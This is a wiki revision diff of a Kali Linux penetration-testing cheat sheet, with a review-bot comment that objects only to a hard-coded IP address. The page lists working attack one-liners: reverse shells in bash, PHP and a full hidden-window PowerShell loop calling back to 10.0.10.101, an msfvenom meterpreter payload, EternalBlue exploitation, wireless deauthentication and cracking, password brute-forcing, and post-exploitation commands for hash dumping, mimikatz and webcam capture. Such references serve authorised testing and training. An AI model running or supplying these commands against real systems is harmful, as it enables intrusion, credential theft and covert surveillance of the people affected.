Kali Cheat Sheet: Difference between revisions

From Xinux Wiki
(The page was newly created: "= Kali Linux Cheat Sheet (Penetration Testing) = == Information Gathering == * nmap -sS -A target.com * whois target.com * theharvester -d target.com -b all *…")
 
 
Line 47: Line 47:
 
* python3 exploit.py
 
* python3 exploit.py
 
* search type:exploit platform:windows
 
* search type:exploit platform:windows
 +
  
 
== System Access & Reverse Shells ==
 
== System Access & Reverse Shells ==
 
* nc -lvnp 4444
 
* nc -lvnp 4444
* bash -i >& /dev/tcp/attacker_ip/4444 0>&1
+
* bash -i >& /dev/tcp/10.0.10.101/4444 0>&1
* powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);"
+
* powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.10.101',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
 
* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
* php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
+
* php -r '$sock=fsockopen("10.0.10.101",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
* msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe
+
* msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f exe > shell.exe
  
 
== Post-Exploitation ==
 
== Post-Exploitation ==
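
Review bot: The changed entries under "System Access & Reverse Shells" replace the attacker_ip placeholder with the literal address 10.0.10.101 in the bash, powershell, php and msfvenom lines. That ties a general cheat sheet to one private (RFC 1918) network and is inconsistent with the placeholder style used elsewhere on the page (target.com, target_ip). Suggest keeping a placeholder in these four entries, or adding one line above the list that says which host 10.0.10.101 refers to, so a reader does not copy an address that means nothing in their own environment.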

Latest revision as of 14:39, 18 January 2026

Kali Linux Cheat Sheet (Penetration Testing)

Information Gathering

Password Attacks

  • hydra -l admin -P rockyou.txt target.com http-get
  • john --wordlist=rockyou.txt hash.txt
  • hashcat -m 0 hash.txt rockyou.txt
  • cewl http://target.com -w wordlist.txt
  • crunch 6 10 abcdef1234
  • medusa -h
  • patator ssh_login host=IP user=FILE0 password=FILE1 0=user.txt 1=pass.txt

Wireless Attacks

  • airmon-ng start wlan0
  • airodump-ng wlan0mon
  • aireplay-ng --deauth 10 -a BSSID wlan0mon
  • aircrack-ng -w wordlist.txt capture.cap
  • wash -i wlan0mon
  • reaver -i wlan0mon -b BSSID -vv
  • wifite

Vulnerability Scanning

Exploitation

  • msfconsole
  • use exploit/windows/smb/ms17_010_eternalblue
  • set RHOST target_ip
  • set PAYLOAD windows/meterpreter/reverse_tcp
  • run
  • python3 exploit.py
  • search type:exploit platform:windows


System Access & Reverse Shells

  • nc -lvnp 4444
  • bash -i >& /dev/tcp/10.0.10.101/4444 0>&1
  • powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.10.101',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • socat TCP4-LISTEN:4444,fork EXEC:/bin/bash
  • php -r '$sock=fsockopen("10.0.10.101",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.10.101 LPORT=4444 -f exe > shell.exe

Post-Exploitation

  • meterpreter > getuid
  • meterpreter > hashdump
  • mimikatz
  • netstat -ano
  • wmic useraccount list brief
  • meterpreter > screenshot
  • meterpreter > webcam_snap
  • ps